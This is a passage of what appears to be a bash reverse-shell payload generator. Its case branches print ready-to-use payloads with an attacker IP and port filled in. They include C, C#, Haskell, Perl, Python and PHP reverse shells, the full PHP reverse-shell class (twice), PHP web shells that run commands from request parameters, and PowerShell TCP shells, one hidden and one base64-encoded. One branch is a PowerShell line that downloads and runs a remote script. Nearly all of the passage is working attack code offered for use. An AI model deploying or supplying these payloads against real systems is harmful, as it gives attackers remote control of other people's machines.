 122 |     ini_processo.cb = sizeof(ini_processo);
 123 |     ini_processo.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW; 
 124 |     ini_processo.hStdInput = ini_processo.hStdOutput = ini_processo.hStdError = (HANDLE)Winsock;
 125 | 
 126 |     TCHAR cmd[255] = TEXT("cmd.exe");
 127 | 
 128 |     CreateProcess(NULL, cmd, NULL, NULL, TRUE, 0, NULL, NULL, &ini_processo, &processo_info);
 129 | 
 130 |     return 0;
 131 | }";;
 132 |         "C# TCP Client")
 133 |         echo "using System;
 134 | using System.Text;
 135 | using System.IO;
 136 | using System.Diagnostics;
 137 | using System.ComponentModel;
 138 | using System.Linq;
 139 | using System.Net;
 140 | using System.Net.Sockets;
 141 | 
 142 | 
 143 | namespace ConnectBack
 144 | {
 145 | 	public class Program
 146 | 	{
 147 | 		static StreamWriter streamWriter;
 148 | 
 149 | 		public static void Main(string[] args)
 150 | 		{
 151 | 			using(TcpClient client = new TcpClient("$ip", $port))
 152 | 			{
 153 | 				using(Stream stream = client.GetStream())
 154 | 				{
 155 | 					using(StreamReader rdr = new StreamReader(stream))
 156 | 					{
 157 | 						streamWriter = new StreamWriter(stream);
 158 | 						
 159 | 						StringBuilder strInput = new StringBuilder();
 160 | 
 161 | 						Process p = new Process();
 162 | 						p.StartInfo.FileName = "bash";
 163 | 						p.StartInfo.CreateNoWindow = true;
 164 | 						p.StartInfo.UseShellExecute = false;
 165 | 						p.StartInfo.RedirectStandardOutput = true;
 166 | 						p.StartInfo.RedirectStandardInput = true;n
 167 | 						p.StartInfo.RedirectStandardError = true;
 168 | 						p.OutputDataReceived += new DataReceivedEventHandler(CmdOutputDataHandler);
 169 | 						p.Start();
 170 | 						p.BeginOutputReadLine();
 171 | 
 172 | 						while(true)
 173 | 						{
 174 | 							strInput.Append(rdr.ReadLine());
 175 | 							//strInput.Append("\n");
 176 | 							p.StandardInput.WriteLine(strInput);
 177 | 							strInput.Remove(0, strInput.Length);
 178 | 						}
 179 | 					}
 180 | 				}
 181 | 			}
 182 | 		}
 183 | 
 184 | 		private static void CmdOutputDataHandler(object sendingProcess, DataReceivedEventArgs outLine)
 185 |         {
 186 |             StringBuilder strOutput = new StringBuilder();
 187 | 
 188 |             if (!String.IsNullOrEmpty(outLine.Data))
 189 |             {
 190 |                 try
 191 |                 {
 192 |                     strOutput.Append(outLine.Data);
 193 |                     streamWriter.WriteLine(strOutput);
 194 |                     streamWriter.Flush();
 195 |                 }
 196 |                 catch (Exception err) { }
 197 |             }
 198 |         }
 199 | 
 200 | 	}
 201 | }";;
 202 |     "C# Bash -i")
 203 |     echo "using System;
 204 | using System.Diagnostics;
 205 | 
 206 | namespace BackConnect {
 207 |   class ReverseBash {
 208 | 	public static void Main(string[] args) {
 209 | 	  Process proc = new System.Diagnostics.Process();
 210 | 	  proc.StartInfo.FileName = "bash";
 211 | 	  proc.StartInfo.Arguments = "-c \"bash -i >& /dev/tcp/$ip/$port 0>&1\"";
 212 | 	  proc.StartInfo.UseShellExecute = false;
 213 | 	  proc.StartInfo.RedirectStandardOutput = true;
 214 | 	  proc.Start();
 215 | 
 216 | 	  while (!proc.StandardOutput.EndOfStream) {
 217 | 		Console.WriteLine(proc.StandardOutput.ReadLine());
 218 | 	  }
 219 | 	}
 220 |   }
 221 | }"
 222 | ;;  
 223 |   "Haskell #1")
 224 |     echo 'module Main where
 225 | import System.Process
 226 | main = callCommand "rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | bash -i 2>&1 | nc '$ip' '$port' >/tmp/f"'
 227 |     ;;
 228 |     "Perl")
 229 |     echo "perl -e 'use Socket;\$i=\"$ip\";\$p=$port;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in(\$p,inet_aton(\$i)))){open(STDIN,\">\&S\");open(STDOUT,\">\&S\");open(STDERR,\">\&S\");exec(\"bash -i\");};'"
 230 |     ;;
 231 |     "Perl no sh")
 232 |     echo "perl -MIO -e '\$p=fork;exit,if(\$p);\$c=new IO::Socket::INET(PeerAddr,\"$ip:$port\");STDIN->fdopen(\$c,r);$~->fdopen(\$c,w);system \$_ while<>;'"
 233 |     ;;
 234 |     "PHP Ivan Sincek")
 235 |     cat <<EOF   
 236 | <?php
 237 | // Copyright (c) 2020 Ivan Sincek
 238 | // v2.3
 239 | // Requires PHP v5.0.0 or greater.
 240 | // Works on Linux OS, macOS, and Windows OS.
 241 | // See the original script at https://github.com/pentestmonkey/php-reverse-shell.
 242 | class Shell {
 243 |     private $addr  = null;
 244 |     private $port  = null;
 245 |     private $os    = null;
 246 |     private $shell = null;
 247 |     private $descriptorspec = array(
 248 |         0 => array('pipe', 'r'), // shell can read from STDIN
 249 |         1 => array('pipe', 'w'), // shell can write to STDOUT
 250 |         2 => array('pipe', 'w')  // shell can write to STDERR
 251 |     );
 252 |     private $buffer  = 1024;    // read/write buffer size
 253 |     private $clen    = 0;       // command length
 254 |     private $error   = false;   // stream read/write error
 255 |     public function __construct($addr, $port) {
 256 |         $this->addr = $addr;
 257 |         $this->port = $port;
 258 |     }
 259 |     private function detect() {
 260 |         $detected = true;
 261 |         if (stripos(PHP_OS, 'LINUX') !== false) { // same for macOS
 262 |             $this->os    = 'LINUX';
 263 |             $this->shell = 'bash';
 264 |         } else if (stripos(PHP_OS, 'WIN32') !== false || stripos(PHP_OS, 'WINNT') !== false || stripos(PHP_OS, 'WINDOWS') !== false) {
 265 |             $this->os    = 'WINDOWS';
 266 |             $this->shell = 'cmd.exe';
 267 |         } else {
 268 |             $detected = false;
 269 |             echo "SYS_ERROR: Underlying operating system is not supported, script will now exit...\n";
 270 |         }
 271 |         return $detected;
 272 |     }
 273 |     private function daemonize() {
 274 |         $exit = false;
 275 |         if (!function_exists('pcntl_fork')) {
 276 |             echo "DAEMONIZE: pcntl_fork() does not exists, moving on...\n";
 277 |         } else if (($pid = @pcntl_fork()) < 0) {
 278 |             echo "DAEMONIZE: Cannot fork off the parent process, moving on...\n";
 279 |         } else if ($pid > 0) {
 280 |             $exit = true;
 281 |             echo "DAEMONIZE: Child process forked off successfully, parent process will now exit...\n";
 282 |         } else if (posix_setsid() < 0) {
 283 |             // once daemonized you will actually no longer see the script's dump
 284 |             echo "DAEMONIZE: Forked off the parent process but cannot set a new SID, moving on as an orphan...\n";
 285 |         } else {
 286 |             echo "DAEMONIZE: Completed successfully!\n";
 287 |         }
 288 |         return $exit;
 289 |     }
 290 |     private function settings() {
 291 |         @error_reporting(0);
 292 |         @set_time_limit(0); // do not impose the script execution time limit
 293 |         @umask(0); // set the file/directory permissions - 666 for files and 777 for directories
 294 |     }
 295 |     private function dump($data) {
 296 |         $data = str_replace('<', '&lt;', $data);
 297 |         $data = str_replace('>', '&gt;', $data);
 298 |         echo $data;
 299 |     }
 300 |     private function read($stream, $name, $buffer) {
 301 |         if (($data = @fread($stream, $buffer)) === false) { // suppress an error when reading from a closed blocking stream
 302 |             $this->error = true;                            // set global error flag
 303 |             echo "STRM_ERROR: Cannot read from ${name}, script will now exit...\n";
 304 |         }
 305 |         return $data;
 306 |     }
 307 |     private function write($stream, $name, $data) {
 308 |         if (($bytes = @fwrite($stream, $data)) === false) { // suppress an error when writing to a closed blocking stream
 309 |             $this->error = true;                            // set global error flag
 310 |             echo "STRM_ERROR: Cannot write to ${name}, script will now exit...\n";
 311 |         }
 312 |         return $bytes;
 313 |     }
 314 |     // read/write method for non-blocking streams
 315 |     private function rw($input, $output, $iname, $oname) {
 316 |         while (($data = $this->read($input, $iname, $this->buffer)) && $this->write($output, $oname, $data)) {
 317 |             if ($this->os === 'WINDOWS' && $oname === 'STDIN') { $this->clen += strlen($data); } // calculate the command length
 318 |             $this->dump($data); // script's dump
 319 |         }
 320 |     }
 321 |     // read/write method for blocking streams (e.g. for STDOUT and STDERR on Windows OS)
 322 |     // we must read the exact byte length from a stream and not a single byte more
 323 |     private function brw($input, $output, $iname, $oname) {
 324 |         $fstat = fstat($input);
 325 |         $size = $fstat['size'];
 326 |         if ($this->os === 'WINDOWS' && $iname === 'STDOUT' && $this->clen) {
 327 |             // for some reason Windows OS pipes STDIN into STDOUT
 328 |             // we do not like that
 329 |             // we need to discard the data from the stream
 330 |             while ($this->clen > 0 && ($bytes = $this->clen >= $this->buffer ? $this->buffer : $this->clen) && $this->read($input, $iname, $bytes)) {
 331 |                 $this->clen -= $bytes;
 332 |                 $size -= $bytes;
 333 |             }
 334 |         }
 335 |         while ($size > 0 && ($bytes = $size >= $this->buffer ? $this->buffer : $size) && ($data = $this->read($input, $iname, $bytes)) && $this->write($output, $oname, $data)) {
 336 |             $size -= $bytes;
 337 |             $this->dump($data); // script's dump
 338 |         }
 339 |     }
 340 |     public function run() {
 341 |         if ($this->detect() && !$this->daemonize()) {
 342 |             $this->settings();
 343 | 
 344 |             // ----- SOCKET BEGIN -----
 345 |             $socket = @fsockopen($this->addr, $this->port, $errno, $errstr, 30);
 346 |             if (!$socket) {
 347 |                 echo "SOC_ERROR: {$errno}: {$errstr}\n";
 348 |             } else {
 349 |                 stream_set_blocking($socket, false); // set the socket stream to non-blocking mode | returns 'true' on Windows OS
 350 | 
 351 |                 // ----- SHELL BEGIN -----
 352 |                 $process = @proc_open($this->shell, $this->descriptorspec, $pipes, null, null);
 353 |                 if (!$process) {
 354 |                     echo "PROC_ERROR: Cannot start the shell\n";
 355 |                 } else {
 356 |                     foreach ($pipes as $pipe) {
 357 |                         stream_set_blocking($pipe, false); // set the shell streams to non-blocking mode | returns 'false' on Windows OS
 358 |                     }
 359 | 
 360 |                     // ----- WORK BEGIN -----
 361 |                     $status = proc_get_status($process);
 362 |                     @fwrite($socket, "SOCKET: Shell has connected! PID: " . $status['pid'] . "\n");
 363 |                     do {
 364 | 						$status = proc_get_status($process);
 365 |                         if (feof($socket)) { // check for end-of-file on SOCKET
 366 |                             echo "SOC_ERROR: Shell connection has been terminated\n"; break;
 367 |                         } else if (feof($pipes[1]) || !$status['running']) {                 // check for end-of-file on STDOUT or if process is still running
 368 |                             echo "PROC_ERROR: Shell process has been terminated\n";   break; // feof() does not work with blocking streams
 369 |                         }                                                                    // use proc_get_status() instead
 370 |                         $streams = array(
 371 |                             'read'   => array($socket, $pipes[1], $pipes[2]), // SOCKET | STDOUT | STDERR
 372 |                             'write'  => null,
 373 |                             'except' => null
 374 |                         );
 375 |                         $num_changed_streams = @stream_select($streams['read'], $streams['write'], $streams['except'], 0); // wait for stream changes | will not wait on Windows OS
 376 |                         if ($num_changed_streams === false) {
 377 |                             echo "STRM_ERROR: stream_select() failed\n"; break;
 378 |                         } else if ($num_changed_streams > 0) {
 379 |                             if ($this->os === 'LINUX') {
 380 |                                 if (in_array($socket  , $streams['read'])) { $this->rw($socket  , $pipes[0], 'SOCKET', 'STDIN' ); } // read from SOCKET and write to STDIN
 381 |                                 if (in_array($pipes[2], $streams['read'])) { $this->rw($pipes[2], $socket  , 'STDERR', 'SOCKET'); } // read from STDERR and write to SOCKET
 382 |                                 if (in_array($pipes[1], $streams['read'])) { $this->rw($pipes[1], $socket  , 'STDOUT', 'SOCKET'); } // read from STDOUT and write to SOCKET
 383 |                             } else if ($this->os === 'WINDOWS') {
 384 |                                 // order is important
 385 |                                 if (in_array($socket, $streams['read'])/*------*/) { $this->rw ($socket  , $pipes[0], 'SOCKET', 'STDIN' ); } // read from SOCKET and write to STDIN
 386 |                                 if (($fstat = fstat($pipes[2])) && $fstat['size']) { $this->brw($pipes[2], $socket  , 'STDERR', 'SOCKET'); } // read from STDERR and write to SOCKET
 387 |                                 if (($fstat = fstat($pipes[1])) && $fstat['size']) { $this->brw($pipes[1], $socket  , 'STDOUT', 'SOCKET'); } // read from STDOUT and write to SOCKET
 388 |                             }
 389 |                         }
 390 |                     } while (!$this->error);
 391 |                     // ------ WORK END ------
 392 | 
 393 |                     foreach ($pipes as $pipe) {
 394 |                         fclose($pipe);
 395 |                     }
 396 |                     proc_close($process);
 397 |                 }
 398 |                 // ------ SHELL END ------
 399 | 
 400 |                 fclose($socket);
 401 |             }
 402 |             // ------ SOCKET END ------
 403 | 
 404 |         }
 405 |     }
 406 | }
 407 | echo '<pre>';
 408 | // change the host address and/or port number as necessary
 409 | $sh = new Shell('$ip', port);
 410 | $sh->run();
 411 | unset($sh);
 412 | // garbage collector requires PHP v5.3.0 or greater
 413 | // @gc_collect_cycles();
 414 | echo '</pre>';
 415 | ?>
 416 |     
 417 | EOF
 418 |             ;;
 419 |     "PHP cmd")
 420 |     echo '<html>
 421 | <body>
 422 | <form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
 423 | <input type="TEXT" name="cmd" id="cmd" size="80">
 424 | <input type="SUBMIT" value="Execute">
 425 | </form>
 426 | <pre>
 427 | <?php
 428 |     if(isset($_GET['cmd']))
 429 |     {
 430 |         system($_GET['cmd']);
 431 |     }
 432 | ?>
 433 | </pre>
 434 | </body>
 435 | <script>document.getElementById("cmd").focus();</script>
 436 | </html>'
 437 |     ;;
 438 |     "PHP cmd2")
 439 |     echo '<?php if(isset($_REQUEST["cmd"])){ echo "<pre>"; $cmd = ($_REQUEST["cmd"]); system($cmd); echo "</pre>"; die; }?>'
 440 |     ;;
 441 |     "PHP cmd small")
 442 |     echo '<?=`$_GET[0]`?>'
 443 |     ;;
 444 |     "PHP exec")
 445 |     echo "php -r '\$sock=fsockopen(\"$ip\",$port);exec(\"bash <&3 >&3 2>&3\");'"
 446 |     ;;
 447 |     "PHP shell_exec")
 448 |     echo "php -r '\$sock=fsockopen(\"$ip\",$port);shell_exec(\"bash <&3 >&3 2>&3\");'"
 449 |     ;;
 450 |     "PHP system")
 451 |     echo "php -r '\$sock=fsockopen(\"$ip\",$port);system(\"bash <&3 >&3 2>&3\");'"
 452 |     ;;
 453 |     "PHP passthru")
 454 |     echo "php -r '\$sock=fsockopen(\"$ip\",$port);passthru(\"bash <&3 >&3 2>&3\");'"
 455 |     ;;
 456 |     "PHP popen")
 457 |     echo "php -r '\$sock=fsockopen(\"$ip\",$port);popen(\"bash <&3 >&3 2>&3\");'"
 458 |     ;;
 459 |         "PHP" | "PHP PentestMonkey")
 460 |             cat <<EOF
 461 | <?php
 462 | // Copyright (c) 2020 Ivan Sincek
 463 | // v2.3
 464 | // Requires PHP v5.0.0 or greater.
 465 | // Works on Linux OS, macOS, and Windows OS.
 466 | // See the original script at https://github.com/pentestmonkey/php-reverse-shell.
 467 | class Shell {
 468 |     private \$addr  = null;
 469 |     private \$port  = null;
 470 |     private \$os    = null;
 471 |     private \$shell = null;
 472 |     private \$descriptorspec = array(
 473 |         0 => array('pipe', 'r'), // shell can read from STDIN
 474 |         1 => array('pipe', 'w'), // shell can write to STDOUT
 475 |         2 => array('pipe', 'w')  // shell can write to STDERR
 476 |     );
 477 |     private \$buffer  = 1024;    // read/write buffer size
 478 |     private \$clen    = 0;       // command length
 479 |     private \$error   = false;   // stream read/write error
 480 |     public function __construct(\$addr, \$port) {
 481 |         \$this->addr = \$addr;
 482 |         \$this->port = \$port;
 483 |     }
 484 |     private function detect() {
 485 |         \$detected = true;
 486 |         if (stripos(PHP_OS, 'LINUX') !== false) { // same for macOS
 487 |             \$this->os    = 'LINUX';
 488 |             \$this->shell = 'bash';
 489 |         } else if (stripos(PHP_OS, 'WIN32') !== false || stripos(PHP_OS, 'WINNT') !== false || stripos(PHP_OS, 'WINDOWS') !== false) {
 490 |             \$this->os    = 'WINDOWS';
 491 |             \$this->shell = 'cmd.exe';
 492 |         } else {
 493 |             \$detected = false;
 494 |             echo "SYS_ERROR: Underlying operating system is not supported, script will now exit...\n";
 495 |         }
 496 |         return \$detected;
 497 |     }
 498 |     private function daemonize() {
 499 |         \$exit = false;
 500 |         if (!function_exists('pcntl_fork')) {
 501 |             echo "DAEMONIZE: pcntl_fork() does not exists, moving on...\n";
 502 |         } else if ((\$pid = @pcntl_fork()) < 0) {
 503 |             echo "DAEMONIZE: Cannot fork off the parent process, moving on...\n";
 504 |         } else if (\$pid > 0) {
 505 |             \$exit = true;
 506 |             echo "DAEMONIZE: Child process forked off successfully, parent process will now exit...\n";
 507 |         } else if (posix_setsid() < 0) {
 508 |             // once daemonized you will actually no longer see the script's dump
 509 |             echo "DAEMONIZE: Forked off the parent process but cannot set a new SID, moving on as an orphan...\n";
 510 |         } else {
 511 |             echo "DAEMONIZE: Completed successfully!\n";
 512 |         }
 513 |         return \$exit;
 514 |     }
 515 |     private function settings() {
 516 |         @error_reporting(0);
 517 |         @set_time_limit(0); // do not impose the script execution time limit
 518 |         @umask(0); // set the file/directory permissions - 666 for files and 777 for directories
 519 |     }
 520 |     private function dump(\$data) {
 521 |         \$data = str_replace('<', '&lt;', \$data);
 522 |         \$data = str_replace('>', '&gt;', \$data);
 523 |         echo \$data;
 524 |     }
 525 |     private function read(\$stream, \$name, \$buffer) {
 526 |         if ((\$data = @fread(\$stream, \$buffer)) === false) { // suppress an error when reading from a closed blocking stream
 527 |             \$this->error = true;                            // set global error flag
 528 |             echo "STRM_ERROR: Cannot read from \${name}, script will now exit...\n";
 529 |         }
 530 |         return \$data;
 531 |     }
 532 |     private function write(\$stream, \$name, \$data) {
 533 |         if ((\$bytes = @fwrite(\$stream, \$data)) === false) { // suppress an error when writing to a closed blocking stream
 534 |             \$this->error = true;                            // set global error flag
 535 |             echo "STRM_ERROR: Cannot write to \${name}, script will now exit...\n";
 536 |         }
 537 |         return \$bytes;
 538 |     }
 539 |     // read/write method for non-blocking streams
 540 |     private function rw(\$input, \$output, \$iname, \$oname) {
 541 |         while ((\$data = \$this->read(\$input, \$iname, \$this->buffer)) && \$this->write(\$output, \$oname, \$data)) {
 542 |             if (\$this->os === 'WINDOWS' && \$oname === 'STDIN') { \$this->clen += strlen(\$data); } // calculate the command length
 543 |             \$this->dump(\$data); // script's dump
 544 |         }
 545 |     }
 546 |     // read/write method for blocking streams (e.g. for STDOUT and STDERR on Windows OS)
 547 |     // we must read the exact byte length from a stream and not a single byte more
 548 |     private function brw(\$input, \$output, \$iname, \$oname) {
 549 |         \$fstat = fstat(\$input);
 550 |         \$size = \$fstat['size'];
 551 |         if (\$this->os === 'WINDOWS' && \$iname === 'STDOUT' && \$this->clen) {
 552 |             // for some reason Windows OS pipes STDIN into STDOUT
 553 |             // we do not like that
 554 |             // we need to discard the data from the stream
 555 |             while (\$this->clen > 0 && (\$bytes = \$this->clen >= \$this->buffer ? \$this->buffer : \$this->clen) && \$this->read(\$input, \$iname, \$bytes)) {
 556 |                 \$this->clen -= \$bytes;
 557 |                 \$size -= \$bytes;
 558 |             }
 559 |         }
 560 |         while (\$size > 0 && (\$bytes = \$size >= \$this->buffer ? \$this->buffer : \$size) && (\$data = \$this->read(\$input, \$iname, \$bytes)) && \$this->write(\$output, \$oname, \$data)) {
 561 |             \$size -= \$bytes;
 562 |             \$this->dump(\$data); // script's dump
 563 |         }
 564 |     }
 565 |     public function run() {
 566 |         if (\$this->detect() && !\$this->daemonize()) {
 567 |             \$this->settings();
 568 | 
 569 |             // ----- SOCKET BEGIN -----
 570 |             \$socket = @fsockopen(\$this->addr, \$this->port, \$errno, \$errstr, 30);
 571 |             if (!\$socket) {
 572 |                 echo "SOC_ERROR: {\$errno}: {\$errstr}\n";
 573 |             } else {
 574 |                 stream_set_blocking(\$socket, false); // set the socket stream to non-blocking mode | returns 'true' on Windows OS
 575 | 
 576 |                 // ----- SHELL BEGIN -----
 577 |                 \$process = @proc_open(\$this->shell, \$this->descriptorspec, \$pipes, null, null);
 578 |                 if (!\$process) {
 579 |                     echo "PROC_ERROR: Cannot start the shell\n";
 580 |                 } else {
 581 |                     foreach (\$pipes as \$pipe) {
 582 |                         stream_set_blocking(\$pipe, false); // set the shell streams to non-blocking mode | returns 'false' on Windows OS
 583 |                     }
 584 | 
 585 |                     // ----- WORK BEGIN -----
 586 |                     \$status = proc_get_status(\$process);
 587 |                     @fwrite(\$socket, "SOCKET: Shell has connected! PID: " . \$status['pid'] . "\n");
 588 |                     do {
 589 | 						\$status = proc_get_status(\$process);
 590 |                         if (feof(\$socket)) { // check for end-of-file on SOCKET
 591 |                             echo "SOC_ERROR: Shell connection has been terminated\n"; break;
 592 |                         } else if (feof(\$pipes[1]) || !\$status['running']) {                 // check for end-of-file on STDOUT or if process is still running
 593 |                             echo "PROC_ERROR: Shell process has been terminated\n";   break; // feof() does not work with blocking streams
 594 |                         }                                                                    // use proc_get_status() instead
 595 |                         \$streams = array(
 596 |                             'read'   => array(\$socket, \$pipes[1], \$pipes[2]), // SOCKET | STDOUT | STDERR
 597 |                             'write'  => null,
 598 |                             'except' => null
 599 |                         );
 600 |                         \$num_changed_streams = @stream_select(\$streams['read'], \$streams['write'], \$streams['except'], 0); // wait for stream changes | will not wait on Windows OS
 601 |                         if (\$num_changed_streams === false) {
 602 |                             echo "STRM_ERROR: stream_select() failed\n"; break;
 603 |                         } else if (\$num_changed_streams > 0) {
 604 |                             if (\$this->os === 'LINUX') {
 605 |                                 if (in_array(\$socket  , \$streams['read'])) { \$this->rw(\$socket  , \$pipes[0], 'SOCKET', 'STDIN' ); } // read from SOCKET and write to STDIN
 606 |                                 if (in_array(\$pipes[2], \$streams['read'])) { \$this->rw(\$pipes[2], \$socket  , 'STDERR', 'SOCKET'); } // read from STDERR and write to SOCKET
 607 |                                 if (in_array(\$pipes[1], \$streams['read'])) { \$this->rw(\$pipes[1], \$socket  , 'STDOUT', 'SOCKET'); } // read from STDOUT and write to SOCKET
 608 |                             } else if (\$this->os === 'WINDOWS') {
 609 |                                 // order is important
 610 |                                 if (in_array(\$socket, \$streams['read'])/*------*/) { \$this->rw (\$socket  , \$pipes[0], 'SOCKET', 'STDIN' ); } // read from SOCKET and write to STDIN
 611 |                                 if ((\$fstat = fstat(\$pipes[2])) && \$fstat['size']) { \$this->brw(\$pipes[2], \$socket  , 'STDERR', 'SOCKET'); } // read from STDERR and write to SOCKET
 612 |                                 if ((\$fstat = fstat(\$pipes[1])) && \$fstat['size']) { \$this->brw(\$pipes[1], \$socket  , 'STDOUT', 'SOCKET'); } // read from STDOUT and write to SOCKET
 613 |                             }
 614 |                         }
 615 |                     } while (!\$this->error);
 616 |                     // ------ WORK END ------
 617 | 
 618 |                     foreach (\$pipes as \$pipe) {
 619 |                         fclose(\$pipe);
 620 |                     }
 621 |                     proc_close(\$process);
 622 |                 }
 623 |                 // ------ SHELL END ------
 624 | 
 625 |                 fclose(\$socket);
 626 |             }
 627 |             // ------ SOCKET END ------
 628 | 
 629 |         }
 630 |     }
 631 | }
 632 | echo '<pre>';
 633 | // change the host address and/or port number as necessary
 634 | \$sh = new Shell('$ip', $port);
 635 | \$sh->run();
 636 | unset(\$sh);
 637 | // garbage collector requires PHP v5.3.0 or greater
 638 | // @gc_collect_cycles();
 639 | echo '</pre>';
 640 | ?>
 641 | EOF
 642 |             ;;
 643 |      "Windows ConPty")
 644 |             echo "IEX(IWR https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell $ip $port"
 645 |             ;;
 646 |         "PowerShell #1")
 647 |             echo "\$LHOST = \"$ip\"; \$LPORT = $port; \$TCPClient = New-Object Net.Sockets.TCPClient(\$LHOST, \$LPORT); \$NetworkStream = \$TCPClient.GetStream(); \$StreamReader = New-Object IO.StreamReader(\$NetworkStream); \$StreamWriter = New-Object IO.StreamWriter(\$NetworkStream); \$StreamWriter.AutoFlush = \$true; \$Buffer = New-Object System.Byte[] 1024; while (\$TCPClient.Connected) { while (\$NetworkStream.DataAvailable) { \$RawData = \$NetworkStream.Read(\$Buffer, 0, \$Buffer.Length); \$Code = ([text.encoding]::UTF8).GetString(\$Buffer, 0, \$RawData -1) }; if (\$TCPClient.Connected -and \$Code.Length -gt 1) { \$Output = try { Invoke-Expression (\$Code) 2>&1 } catch { \$_ }; \$StreamWriter.Write(\"\$Outputn\"); \$Code = \$null } }; \$TCPClient.Close(); \$NetworkStream.Close(); \$StreamReader.Close(); \$StreamWriter.Close()"
 648 |             ;;
 649 |         "PowerShell #2")
 650 |             echo "powershell -nop -c \"\$client = New-Object System.Net.Sockets.TCPClient('$ip',$port);\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> ';\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()\""
 651 |             ;;
 652 |         "PowerShell #3")
 653 |             echo "powershell -nop -W hidden -noni -ep bypass -c \"\$TCPClient = New-Object Net.Sockets.TCPClient('$ip', $port);\$NetworkStream = \$TCPClient.GetStream();\$StreamWriter = New-Object IO.StreamWriter(\$NetworkStream);function WriteToStream (\$String) {[byte[]]\$script:Buffer = 0..\$TCPClient.ReceiveBufferSize | % {0};\$StreamWriter.Write(\$String + 'SHELL> ');\$StreamWriter.Flush()}WriteToStream '';while((\$BytesRead = \$NetworkStream.Read(\$Buffer, 0, \$Buffer.Length)) -gt 0) {\$Command = ([text.encoding]::UTF8).GetString(\$Buffer, 0, \$BytesRead - 1);\$Output = try {Invoke-Expression \$Command 2>&1 | Out-String} catch {\$_ | Out-String}WriteToStream (\$Output)}\$StreamWriter.Close()\""
 654 |             ;;
 655 |         "PowerShell #4 (TLS)")
 656 |             echo "\$sslProtocols = [System.Security.Authentication.SslProtocols]::Tls12; \$TCPClient = New-Object Net.Sockets.TCPClient('$ip', $port);\$NetworkStream = \$TCPClient.GetStream();\$SslStream = New-Object Net.Security.SslStream(\$NetworkStream,\$false,({$true} -as [Net.Security.RemoteCertificateValidationCallback]));\$SslStream.AuthenticateAsClient('cloudflare-dns.com',\$null,\$sslProtocols,\$false);if(!\$SslStream.IsEncrypted -or !\$SslStream.IsSigned) {\$SslStream.Close();exit}\$StreamWriter = New-Object IO.StreamWriter(\$SslStream);function WriteToStream (\$String) {[byte[]]\$script:Buffer = New-Object System.Byte[] 4096 ;\$StreamWriter.Write(\$String + 'SHELL> ');\$StreamWriter.Flush()};WriteToStream '';while((\$BytesRead = \$SslStream.Read(\$Buffer, 0, \$Buffer.Length)) -gt 0) {\$Command = ([text.encoding]::UTF8).GetString(\$Buffer, 0, \$BytesRead - 1);\$Output = try {Invoke-Expression \$Command 2>&1 | Out-String} catch {\$_ | Out-String}WriteToStream (\$Output)}\$StreamWriter.Close()"
 657 |             ;;
 658 |         "PowerShell #3 (Base64)")
 659 |             echo "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAJABpAHAAIgAsACQAcABvAHIAdAApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA="
 660 |             ;;
 661 |         "Python #1")
 662 |         echo "export RHOST="$ip";export RPORT=$port;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")'";;
 663 |          "Python #2")
